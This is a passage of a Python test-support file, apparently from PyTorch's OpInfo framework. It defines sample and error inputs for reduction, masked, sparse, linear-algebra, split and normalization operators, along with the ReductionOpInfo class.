self.dtypesIfROCM if TEST_WITH_ROCM else self.dtypesIfCUDA else: return self.dtypes def supported_backward_dtypes(self, device_type): if not self.supports_autograd: return set() backward_dtypes = None if device_type == 'cpu': backward_dtypes = self.backward_dtypes elif device_type == 'cuda': backward_dtypes = self.backward_dtypesIfROCM if TEST_WITH_ROCM else self.backward_dtypesIfCUDA else: backward_dtypes = self.backward_dtypes allowed_backward_dtypes = floating_and_complex_types_and(torch.bfloat16, torch.float16, torch.complex32) return set(allowed_backward_dtypes).intersection(backward_dtypes) def supports_dtype(self, dtype, device_type): return dtype in self.supported_dtypes(device_type) @property def formatted_name(self): """Returns a formatted full name for this OpInfo that can be used in test names.""" variant = '_' + self.variant_test_name.replace('.', '_') if self.variant_test_name else '' return '{}{}'.format(self.name.replace('.', '_'), variant) def _generate_reduction_inputs(device, dtype, requires_grad, **kwargs): """Generates input tensors for testing reduction operators""" yield make_tensor([], dtype=dtype, device=device, requires_grad=requires_grad) yield make_tensor([2], dtype=dtype, device=device, requires_grad=requires_grad) yield make_tensor([3, 5], dtype=dtype, device=device, requires_grad=requires_grad) yield make_tensor([3, 2, 1, 2], dtype=dtype, device=device, requires_grad=requires_grad) def _generate_reduction_kwargs(ndim, supports_multiple_dims=True): """Generates a subset of all valid dim and keepdim kwargs given ndim that is appropriate for testing reduction operators. 
""" # Test default dim and keepdim yield {} # Test reducing inner and outer most dimensions yield {'dim': 0, 'keepdim': True} yield {'dim': -1, 'keepdim': False} # Test reducing middle dimension if ndim > 2: yield {'dim': ndim // 2, 'keepdim': True} if supports_multiple_dims: # Test reducing all dimensions yield {'dim': tuple(range(ndim)), 'keepdim': False} # Test reducing both first and last dimensions if ndim > 1: yield {'dim': (0, -1), 'keepdim': True} # Test reducing every other dimension starting with the second if ndim > 3: yield {'dim': tuple(range(1, ndim, 2)), 'keepdim': False} def sample_inputs_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for reduction operators.""" # TODO(@heitorschueroff) Once all reduction operators are using # ReductionOpInfo use op_info.supports_multiple_dims directly. supports_multiple_dims: bool = kwargs.get('supports_multiple_dims', True) # TODO(@heitorschueroff) Once all reduction operators are using ReductionOpInfo # use op_info.generate_args_kwargs directly. generate_args_kwargs = kwargs.get('generate_args_kwargs', lambda *args, **kwargs: (yield tuple(), {})) for t in _generate_reduction_inputs(device, dtype, requires_grad): for reduction_kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims): for args, kwargs in generate_args_kwargs(t, **reduction_kwargs): kwargs.update(reduction_kwargs) yield SampleInput(t.detach().requires_grad_(requires_grad), args=args, kwargs=kwargs) def _generate_masked_op_mask(input_shape, device, **kwargs): yield None yield make_tensor(input_shape, dtype=torch.bool, device=device, requires_grad=False) if len(input_shape) > 2: # broadcast last mask dimension: yield make_tensor(input_shape[:-1] + (1,), dtype=torch.bool, device=device, requires_grad=False) # broadcast middle mask dimension: yield make_tensor(input_shape[:1] + (1,) + input_shape[2:], dtype=torch.bool, device=device, requires_grad=False) # broadcast first mask dimension: yield make_tensor((1,) + input_shape[1:], dtype=torch.bool, device=device, requires_grad=False) # mask.ndim < input.ndim yield make_tensor(input_shape[1:], dtype=torch.bool, device=device, requires_grad=False) # mask.ndim == 1 yield make_tensor(input_shape[-1:], dtype=torch.bool, device=device, requires_grad=False) # masks that require broadcasting of inputs (mask.ndim > # input.ndim) will not be supported, however, we may # reconsider this if there will be demand on this kind of # degenerate cases. def sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked reduction operators. Masked reduction operator is a reduction operator with trailing mask optional argument. A mask is a bool tensor with the same shape as input or a shape that is broadcastable to input shape. 
""" kwargs['supports_multiple_dims'] = op_info.supports_multiple_dims for sample_input in sample_inputs_reduction(op_info, device, dtype, requires_grad, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) yield SampleInput(sample_input.input.detach().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) if(not requires_grad and dtype.is_floating_point and sample_input.input.ndim == 2 and mask is not None and mask.shape == sample_input.input.shape): for v in [torch.inf, -torch.inf, torch.nan]: t = sample_input.input.detach() t.diagonal(0, -2, -1).fill_(v) yield SampleInput(t.requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs) def sample_inputs_sparse_coo_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked reduction operators that support inputs with sparse coo layouts. """ if op_info.supports_sparse: op_name = op_info.name.replace('_masked.', '') for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): mask = sample_input.kwargs.get('mask') if mask is not None: sample_input_kwargs = sample_input.kwargs.copy() sample_input_kwargs.update(mask=mask.to_sparse()) yield SampleInput(sample_input.input.to_sparse(), args=sample_input.args, kwargs=sample_input_kwargs) else: if op_name in {'prod', 'amax', 'amin'}: # FIXME: for now reductions with non-zero reduction identity and # unspecified mask are not supported for sparse COO # tensors, see torch._masked.prod implementation # for details. continue yield SampleInput(sample_input.input.to_sparse(), args=sample_input.args, kwargs=sample_input.kwargs) def sample_inputs_sparse_csr_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked reduction operators that support inputs with sparse csr layouts. """ if op_info.supports_sparse_csr: for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs): if not (sample_input.input.ndim == 2 and sample_input.kwargs.get('keepdim')): # - sparse CSR tensors are always 2-D tensors # - masked reduction on CSR tensors are defined only if keepdim is True. continue mask = sample_input.kwargs.get('mask') if mask is not None: sample_input_kwargs = sample_input.kwargs.copy() sample_input_kwargs.update(mask=mask.to_sparse_csr()) new_sample = SampleInput(sample_input.input.to_sparse_csr(), args=sample_input.args, kwargs=sample_input_kwargs) else: if op_info.name.lstrip('_masked.') in ['prod']: # reductions with non-zero reduction identity and # unspecified mask is not supported for sparse CSR # tensors, see torch._masked.prod implementation # for details. continue new_sample = SampleInput(sample_input.input.to_sparse_csr(), args=sample_input.args, kwargs=sample_input.kwargs) yield new_sample if sample_input.kwargs['dim'] == 0: # Reductions of CSR tensors use different implementations for # inner and/or outer dimensions. So, as a minimum of testing CSR # implementations the following kwargs must be generated: # dict(dim=0, keepdim=True) # dict(dim=1, keepdim=True) # dict(dim=(0, 1), keepdim=True) # Here we generate the dim=1 case from the dim=0 case. 
                sample_input_kwargs = new_sample.kwargs.copy()
                sample_input_kwargs.update(dim=1)
                yield SampleInput(new_sample.input.clone(),
                                  args=sample_input.args, kwargs=sample_input_kwargs)


def sample_inputs_masked_norm(op_info, device, dtype, requires_grad, **kwargs):
    """Sample inputs for masked norm.
    """
    for ord in [2.0, 1, float('inf'), float('-inf'), 0]:
        for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs):
            sample_input_args, sample_input_kwargs = (ord,) + sample_input.args, sample_input.kwargs.copy()
            yield SampleInput(sample_input.input.clone().requires_grad_(requires_grad),
                              args=sample_input_args, kwargs=sample_input_kwargs)


def sample_inputs_masked_std_var(op_info, device, dtype, requires_grad, **kwargs):
    """Sample inputs for masked std/var.
    """
    for unbiased in [False, True]:
        for sample_input in sample_inputs_masked_reduction(op_info, device, dtype, requires_grad, **kwargs):
            if sample_input.args:
                dim = sample_input.args[0]
                sample_input_args = sample_input.args[:1] + (unbiased,) + sample_input.args[1:]
                sample_input_kwargs = sample_input.kwargs.copy()
            else:
                dim = sample_input.kwargs.get('dim')
                sample_input_args = sample_input.args
                sample_input_kwargs = dict(sample_input.kwargs, unbiased=unbiased)
            if requires_grad:
                if sample_input_kwargs.get('mask') is None:
                    orig_count = torch._masked.sum(torch.ones(sample_input.input.shape, dtype=torch.int64),
                                                   dim, keepdim=True)
                else:
                    inmask = torch._masked._input_mask(sample_input.input, *sample_input_args, **sample_input_kwargs)
                    orig_count = torch._masked.sum(inmask.new_ones(sample_input.input.shape, dtype=torch.int64),
                                                   dim, keepdim=True, mask=inmask)
                if orig_count.min() <= int(unbiased) + 1:
                    # Skip samples that lead to singularities in var
                    # computation, resulting in nan values both in var and
                    # autograd output that test_grad_fn cannot handle
                    # correctly. Also skip samples where the autograd output
                    # for std could not be handled correctly due to torch.sqrt.
                    continue
            yield SampleInput(sample_input.input.detach().requires_grad_(requires_grad),
                              args=sample_input_args, kwargs=sample_input_kwargs)


# NOTE [Reductions]:
#
# For testing purposes, we relax the definition of a reduction operator
# as defined in the docstring below. We do this to capture operators with
# a similar API so they can be tested automatically. However...
#
# Strictly speaking a reduction operator is an operator that can reduce an
# array to a single scalar value and that can be computed from the partial
# result of reducing subarrays. This usually means that the reduction operation
# should be commutative and associative. This definition is important when it
# comes to implementation as it determines how a reduction can be parallelized.
#
# For example, many summary statistics such as median, mode and quantile cannot
# be computed from partial results because these are sorting and counting based
# algorithms that need information that would be lost in the reduced value.
class ReductionOpInfo(OpInfo):
    """Reduction operator information.

    An operator is a reduction operator if it reduces one or more dimensions of
    the input tensor to a single value. Reduction operators must implement the
    following signature:

    - `op(input, *args, *, dim=None, keepdim=False, **kwargs) -> Tensor`

    ReductionOpInfo tests that reduction operators implement a consistent API.
    Optional features such as reducing over multiple dimensions are captured in
    the optional keyword parameters of the ReductionOpInfo constructor.
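
    As an informal illustration of the expected API (not an exhaustive
    contract), for a reduction `op` and a valid dimension `d` one generally
    expects:

        op(input, dim=d, keepdim=True).squeeze(d) == op(input, dim=d)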
If a reduction operator does not yet implement the full required API of reduction operators, this should be documented by skipping the failing tests rather than adding optional parameters to ReductionOpInfo. NOTE The API for reduction operators has not yet been finalized and some requirements may change. See tests in test/test_reductions.py """ def __init__( self, name, *, # The identity value for the operator if it has one. identity: Optional[Any] = None, # The nan policy for the operator if it implements one. # - propagate: NaN values are propagated to the output # - omit: NaN values are discarded during the reduction nan_policy: Optional[str] = None, # Whether the operator supports reducing multiple dimensions. supports_multiple_dims: bool = True, # Whether the operator promotes integral to floating point dtypes. promotes_int_to_float: bool = False, # Whether the operator promotes all integral dtypes to int64. promotes_int_to_int64: bool = False, # If a specific dtype is given, then the operator always returns that # dtype irrespective of the input dtype. If None, the operator returns # the dtype according to the type promotion rules above. result_dtype: Optional[torch.dtype] = None, # Casts complex results to real (e.g. linalg.norm or torch.var) complex_to_real: bool = False, # ReductionOpInfo tests generate their own input, dim and keepdim # arguments and call this function to generate tuples of extra args and # kwargs to use when calling the op. This is required for operators that # have other required parameters besides the input tensor. generate_args_kwargs: Callable = lambda t, dim=None, keepdim=False: (yield tuple(), {}), # Options from the OpInfo base class **kwargs, ): self._original_reduction_args = locals().copy() assert nan_policy in (None, 'propagate', 'omit') # These are mutually exclusive options assert not (result_dtype and promotes_int_to_float) assert not (result_dtype and promotes_int_to_int64) assert not (result_dtype and complex_to_real) assert not (promotes_int_to_float and promotes_int_to_int64) # Default sample_inputs_func for ReductionOpInfo which augments sample # inputs from sample_inputs_reduction with the args and kwargs from # generate_args_kwargs. This is only used if sample_inputs_func is None. def sample_inputs_func(*args, **kwargs): kwargs['supports_multiple_dims'] = supports_multiple_dims kwargs['generate_args_kwargs'] = generate_args_kwargs yield from sample_inputs_reduction(*args, **kwargs) # Override OpInfo defaults and call base class __init__ kwargs.setdefault('inplace_variant', None) kwargs.setdefault('sample_inputs_func', sample_inputs_func) super().__init__(name, **kwargs) self.identity = identity self.nan_policy = nan_policy self.supports_multiple_dims = supports_multiple_dims self.promotes_int_to_float = promotes_int_to_float self.promotes_int_to_int64 = promotes_int_to_int64 self.complex_to_real = complex_to_real self.result_dtype = result_dtype self.generate_args_kwargs = generate_args_kwargs def sample_inputs_tensor_split(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, low=None, high=None, requires_grad=requires_grad) args_cases = ( # Cases with tensor indices. (torch.tensor([1, 2, 3]),), (torch.tensor(1),), (torch.tensor([1, 2, 3]), 1), (torch.tensor([1, 4, 2, 5, 3, 6])[::2], 1), # Cases with list of indices. ((2, 4),), ((2, 4), 1), ((2, 4), -1), # Cases with integer section. 
(3,), (3, 1), (3, -1), ) for args in args_cases: yield SampleInput(make_input((S, S, S)), args=args) def sample_inputs_linalg_det(op_info, device, dtype, requires_grad, **kwargs): kw = dict(device=device, dtype=dtype) inputs = [ make_tensor((S, S), **kw), make_tensor((1, 1), **kw), # 1x1 random_symmetric_matrix(S, **kw), # symmetric random_symmetric_psd_matrix(S, **kw), # symmetric_psd random_symmetric_pd_matrix(S, **kw), # symmetric_pd random_square_matrix_of_rank(S, S - 2, **kw), # dim2_null random_square_matrix_of_rank(S, 1, **kw), # rank1 random_square_matrix_of_rank(S, 2, **kw), # rank2 make_fullrank_matrices_with_distinct_singular_values(S, S, **kw), # full rank make_tensor((3, 3, S, S), **kw), # batched make_tensor((3, 3, 1, 1), **kw), # batched_1x1 random_symmetric_matrix(S, 3, **kw), # batched_symmetric random_symmetric_psd_matrix(S, 3, **kw), # batched_symmetric_psd random_symmetric_pd_matrix(S, 3, **kw), # batched_symmetric_pd make_fullrank_matrices_with_distinct_singular_values(S, 3, 3, **kw), # batched fullrank make_tensor((0, 0), **kw), make_tensor((0, S, S), **kw), ] for t in inputs: t.requires_grad = requires_grad return [SampleInput(t) for t in inputs] def sample_inputs_linalg_det_singular(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype) def make_singular_matrix_batch_base(size, rank): assert size[-1] == size[-2] assert rank > 0 and rank < size[-1] n = size[-1] a = make_arg(size[:-2] + (n, rank)) / 10 b = make_arg(size[:-2] + (rank, n)) / 10 x = a @ b lu, pivs, _ = torch.linalg.lu_factor_ex(x) p, l, u = torch.lu_unpack(lu, pivs) u_diag_abs = u.diagonal(0, -2, -1).abs() u_diag_abs_largest = u_diag_abs.max(dim=-1, keepdim=True).values u_diag_abs_smallest_idxs = torch.topk(u_diag_abs, k=(n - rank), largest=False).indices u.diagonal(0, -2, -1).div_(u_diag_abs_largest) u.diagonal(0, -2, -1)[..., u_diag_abs_smallest_idxs] = torch.finfo(dtype).eps matrix = p @ l @ u matrix.requires_grad_(requires_grad) return matrix def sample_generator(): for batch, size in product(((), (2,), (2, 2)), range(6)): shape = batch + (size, size) for rank in range(1, size): yield make_singular_matrix_batch_base(shape, rank) return [SampleInput(t) for t in sample_generator()] def sample_inputs_linalg_matrix_power(op_info, device, dtype, requires_grad, **kwargs): make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) make_arg_fullrank = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) # (<matrix_size>, (<batch_sizes, ...>)) test_sizes = [ (1, ()), (2, (0,)), (2, (2,)), ] for matrix_size, batch_sizes in test_sizes: size = batch_sizes + (matrix_size, matrix_size) for n in (0, 3, 5): yield SampleInput(make_arg(size), args=(n,)) for n in [-4, -2, -1]: yield SampleInput(make_arg_fullrank(*size), args=(n,)) def sample_inputs_hsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((6,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([1, 2, 3],),),) def sample_inputs_vsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((6, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, 
high=None, requires_grad=requires_grad), args=([1, 2, 3],),),) def sample_inputs_dsplit(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([1, 2, 3],),), SampleInput(make_tensor((S, S, 6), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(2,),),) def error_inputs_hsplit(op_info, device, **kwargs): err_msg1 = ("torch.hsplit requires a tensor with at least 1 dimension, " "but got a tensor with 0 dimensions!") si1 = SampleInput(make_tensor((), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.hsplit attempted to split along dimension 1, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def error_inputs_vsplit(op_info, device, **kwargs): err_msg1 = ("torch.vsplit requires a tensor with at least 2 dimension, " "but got a tensor with 1 dimensions!") si1 = SampleInput(make_tensor((S,), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.vsplit attempted to split along dimension 0, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def error_inputs_dsplit(op_info, device, **kwargs): err_msg1 = ("torch.dsplit requires a tensor with at least 3 dimension, " "but got a tensor with 1 dimensions!") si1 = SampleInput(make_tensor((S,), dtype=torch.float32, device=device), args=(0,),) err_msg2 = (f"torch.dsplit attempted to split along dimension 2, " f"but the size of the dimension {S} " f"is not divisible by the split_size 0!") si2 = SampleInput(make_tensor((S, S, S), dtype=torch.float32, device=device), args=(0,),) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2),) def sample_inputs_linalg_multi_dot(op_info, device, dtype, requires_grad, **kwargs): # Each test case consists of the sizes in the chain of multiplications # e.g. 
[2, 3, 4, 5] generates matrices (2, 3) @ (3, 4) @ (4, 5) test_cases = [ [1, 2, 1], [2, 0, 2], [0, 2, 2], [2, 2, 2, 2], [2, 3, 4, 5], [5, 4, 0, 2], [2, 4, 3, 5, 3, 2] ] result = [] for sizes in test_cases: tensors = [] for size in zip(sizes[:-1], sizes[1:]): t = make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad) tensors.append(t) result.append(SampleInput(tensors)) return result def sample_inputs_linalg_matrix_norm(op_info, device, dtype, requires_grad, **kwargs): sizes = ((2, 2), (2, 3, 2)) ords = ('fro', 'nuc', inf, -inf, 1, -1, 2, -2) dims = ((-2, -1), (-1, 0)) inputs: List[SampleInput] = [] for size, ord, dim, keepdim in product(sizes, ords, dims, [True, False]): t = make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad) inputs.append(SampleInput(t, args=(ord, dim, keepdim))) return inputs def sample_inputs_linalg_norm(op_info, device, dtype, requires_grad, *, variant=None, **kwargs): if variant is not None and variant not in ('subgradient_at_zero',): raise ValueError(f"Unsupported variant, expected variant to be 'subgradient_at_zero' but got: {variant}") test_sizes = [ (S,), (0,), (S, S), (0, 0), (S, 0), (0, S), (S, S, S), (0, S, S), (S, 0, S), (0, 0, 0), ] vector_ords = (None, 0, 0.5, 1, 2, 3.5, inf, -0.5, -1, -2, -3.5, -inf) matrix_ords = (None, 'fro', 'nuc', 1, 2, inf, -1, -2, -inf) inputs = [] for test_size in test_sizes: is_vector_norm = len(test_size) == 1 is_matrix_norm = len(test_size) == 2 for keepdim in [False, True]: if not variant == 'subgradient_at_zero': inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), kwargs=dict( keepdim=keepdim))) if not (is_vector_norm or is_matrix_norm): continue ords = vector_ords if is_vector_norm else matrix_ords for ord in ords: if variant == 'subgradient_at_zero': inputs.append(SampleInput( torch.zeros( test_size, dtype=dtype, device=device, requires_grad=requires_grad), args=(ord,), kwargs=dict(keepdim=keepdim))) else: inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(ord,), kwargs=dict( keepdim=keepdim))) if ord in ['nuc', 'fro']: inputs.append(SampleInput( make_tensor( test_size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), kwargs=dict( ord=ord, keepdim=keepdim, dim=(0, 1)))) return inputs def sample_inputs_as_strided(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input shape, output shape, output stride, output storage offset test_cases = ( ((1,), (1,), (1,), 0), ((3, 3), (2, 2), (1, 2), 0), ((3, 3), (2, 2), (1, 2), 1), ((16,), (2, 2, 2, 2), (1, 1, 1, 1), 0), ((16,), (2, 1, 1, 2), (1, 7, 7, 1), 0), ) for input_shape, output_shape, stride, storage_offset in test_cases: input_t = make_arg(input_shape) kwargs = dict(storage_offset=storage_offset) yield SampleInput(input_t, args=(output_shape, stride), kwargs=kwargs) # as_strided on offset, partial views # yield SampleInput(make_arg((20,))[5:15], args=((2, 2), (1, 2))) # yield SampleInput(make_arg((20,))[5:15], args=((2, 2), (1, 2)), kwargs={'storage_offset': 0}) def sample_inputs_as_strided_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input shape, output shape, output stride, output storage offset test_cases = [ ((1,), (1,), (1,), 0), ((3, 3), (2, 2), (1, 2), 
0), ((3, 3), (2, 2), (1, 2), 1), ((16,), (2, 2, 2, 2), (1, 1, 1, 1), 0), ((16,), (2, 1, 1, 2), (1, 7, 7, 1), 0), ] samples = [] for input_shape, output_shape, stride, storage_offset in test_cases: input_t = make_arg(input_shape) input_src = make_arg(output_shape) kwargs = dict(storage_offset=storage_offset) samples.append(SampleInput(input_t, args=(input_src, output_shape, stride), kwargs=kwargs)) return samples def sample_inputs_combinations(op_info, device, dtype, requires_grad, **kwargs): inputs = ( (0,), (0, 1), (0, 1, 2, 3), ) rvals = [1, 2, 4] products = product(inputs, rvals, [False, True]) samples = [] for input_data, r, with_replacement in products: input_t = torch.tensor(input_data, device=device, dtype=dtype, requires_grad=requires_grad) kwargs = dict(r=r, with_replacement=with_replacement) samples.append(SampleInput(input_t, kwargs=kwargs)) return tuple(samples) def sample_inputs_cartesian_prod(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(torch.tensor, device=device, dtype=dtype, requires_grad=requires_grad) # constructs 1-D tensors with varying number of elements a = make_arg((0,)) b = make_arg((0, 1)) c = make_arg((0, 1, 2, 3)) samples = [] # sample with only 1 tensor samples.append(SampleInput( a )) # sample with 2 tensors samples.append(SampleInput( a, args=(b,) )) # sample with 3 tensors samples.append(SampleInput( a, args=(b, c) )) return tuple(samples) def sample_inputs_cosine_similarity(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as input_shape, dict of dim and eps cases: Tuple[tuple, dict] = ( # type: ignore[assignment] ((S, S), {'dim': 1}), ((S, 2), {'dim': -1}), ((S,), {'dim': 0, 'eps': 0.5}), ((), {'dim': 0}), ((S, S, M), {'dim': 2}), ((S, S), {}) ) for input_shape, kwargs in cases: yield SampleInput(make_arg(input_shape), args=(make_arg(input_shape),), kwargs=kwargs) # Test for Broadcasting yield SampleInput(make_arg((1, 2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -1}) yield SampleInput(make_arg((1, 2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -2}) yield SampleInput(make_arg((2, 3)), args=(make_arg((2, 1, 3)),), kwargs={'dim': -1}) def sample_inputs_batch_norm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_arg_without_requires_grad = partial(make_tensor, device=device, dtype=dtype, requires_grad=False) # Ordered as: input shape, kwargs for training, momentum, eps cases: Tuple[Tuple[int], dict] = ( # type: ignore[assignment] ((S, S, S), {'training': True, 'momentum': 0.5, 'eps': 0.6}), ((3, 2, 4), {'training': False, 'momentum': -1.2}), ((3, 1), {'training': True, 'momentum': 0.0}), ((0,), {'training': True}), ((0,), {'training': False}), ((3, 2, 3, 4), {'training': True, 'momentum': -1.0, 'eps': 0.5}), ((3, 2, 3, 4), {'training': False, 'momentum': -1.0, 'eps': 0.5}), ((2, 1), {}), ) for input_shape, kwargs in cases: # args: running mean, running var, weight and bias should necessarily be of shape: (channels,) channels = input_shape[1] if len(input_shape) > 1 else 0 weight = make_arg(channels) if channels > 0 else None bias = make_arg(channels) if channels > 0 else None running_mean = make_arg_without_requires_grad(channels, low=0) running_var = make_arg_without_requires_grad(channels, low=0) yield SampleInput( make_arg(input_shape), args=( running_mean, running_var, weight, bias ), kwargs=kwargs ) # Checking for permutations of 
weights and biases as `None` weights = [channels, None, None] biases = [None, channels, None] is_training = [True, False, False] for weight, bias, training in zip(weights, biases, is_training): yield SampleInput( make_arg(input_shape), args=( running_mean, running_var, make_arg(channels), make_arg(channels) ), kwargs={'training': training} ) # Test case for no optional kwargs # running_mean and running_var are required in evaluation mode (training: False) but not in training mode yield SampleInput(make_arg((1, 2, 3)), args=(None, None), kwargs={'training': True}) def sample_inputs_nn_activation_relu(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( (()), ((S, )), ((S, S)), ((S, M, S)) ) for shape in cases: yield SampleInput(make_arg(shape)) def sample_inputs_nn_functional_prelu(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( (()), ((S, )), ((S, S)), ((S, M, S)) ) for shape in cases: for weight in [-1., 0., 0.8, 1.]: weight_tensor = torch.tensor(weight, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg(shape), args=(weight_tensor,)) if len(shape) >= 2: channel_size = shape[1] yield SampleInput(make_arg(shape), args=(make_arg((channel_size,)),)) weight_tensor = torch.tensor(1., device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), kwargs=dict(weight=weight_tensor,)) yield SampleInput(make_arg((S, S)), kwargs=dict(weight=make_arg((S,)),)) def sample_inputs_norm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # ord = inf is tested in inputs_norm_inf as it fails on some tests cases = [ ((S, S), (2,), '2'), ((S, S), (0,), '0'), ((S, S), (0.5,), '0_5'), ((S, S), (1,), '1'), ((S, S), (3,), '3'), ((S, S), (-1,), 'neg_1'), ((S, S), (-2,), 'neg_2'), ((S, S), (-0.5,), 'neg_0_5'), ((S, S), (-1.5,), 'neg_1_5'), ] cases_nonzero_input = ( ((S, S, S), (1.5,), '1_5_default'), ((S, S, S), (1.5, 1), '1_5_dim'), ((S, S, S), (1.5, -1), '1_5_neg_dim'), ((S, S, S), (1.5, 1, True), 'keepdim_1_5_dim'), ((S, S, S), (1.5, -1, True), 'keepdim_1_5_neg_dim'), ) cases_posdim = ( ((S, S), (-2, 1,), 'neg_2_dim'), ((S, S), (-1, 1,), 'neg_1_dim'), ((S, S), (0, 1,), '0_dim'), ((S, S), (1, 1,), '1_dim'), ((S, S), (2, 1,), '2_dim'), ((S, S), (3, 1,), '3_dim'), ((S, S, S), (2, 1), '2_dim'), ((S, S, S), (3, 1), '3_dim'), ((S, S, S), (2, 1, True), 'keepdim_2_dim'), ((S, S, S), (3, 1, True), 'keepdim_3_dim'), ((), (2, 0), '2_dim_scalar'), ((), (3, 0), '3_dim_scalar'), ((), (2, 0, True), 'keepdim_2_dim_scalar'), ((), (3, 0, True), 'keepdim_3_dim_scalar'), ) cases_negdim = ((shape, args[:1] + (-args[1],) + args[2:], name.replace("_dim", "_neg_dim")) for shape, args, name in cases_posdim) for shape, args, name in itertools.chain(cases, cases_posdim, cases_negdim): yield SampleInput(make_arg(shape), args=args, name=name) for shape, args, name in cases_nonzero_input: yield SampleInput(make_arg(shape, exclude_zero=True), args=args, name=name) def sample_inputs_norm_fro(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((S, S), (), 'default'), ((S, S), ('fro',), 'fro_default'), ((S, S), ('fro', [0, 1],), 'fro'), ) for shape, args, name in cases: yield SampleInput(make_arg(shape), 
def sample_inputs_norm_nuc(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    cases = (
        ((S, S), ('nuc',), 'nuc'),
        ((S, S, S), ('nuc', [1, 2]), 'nuc_batched'),
    )

    for shape, args, name in cases:
        yield SampleInput(make_arg(shape), args=args, name=name)

def sample_inputs_norm_inf(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    cases = (
        ((S, S), (-inf,), '-inf'),
        ((S, S), (inf,), 'inf'),
        ((S, S), (inf, 1,), 'inf_2_dim'),
        ((S, S), (inf, -1,), 'inf_2_neg_dim'),
    )

    for shape, args, name in cases:
        yield SampleInput(make_arg(shape), args=args, name=name)

def sample_kwargs_vector_norm(t, **kwargs):
    # orders with / without identity
    def ords():
        has_id = (6, 4, 2, 1, 0, 0.9)
        no_id = (inf, -2.1, -inf)
        if t.numel() == 0:
            dim = kwargs.get("dim")
            if dim is None:
                return has_id
            if not isinstance(dim, Iterable):
                dim = (dim,)
            for d in dim:
                if t.size(d) == 0:
                    return has_id
        return has_id + no_id

    return (((), dict(ord=o)) for o in ords())

# The following functions and classes are for testing elementwise binary operators.

# Returns a generator of pairs of contiguous tensors on the requested device
# and with the requested dtype.
#
# This function is intended to test the non-vectorized and vectorized code
# paths of elementwise binary functions, as well as their handling of odd tensor
# sizes (like zero-dim tensors and tensors with zero elements).
#
# Each iterable will include a tensor with no elements,
# zero dim (scalar) tensors, small 1D tensors, a medium 1D tensor, and
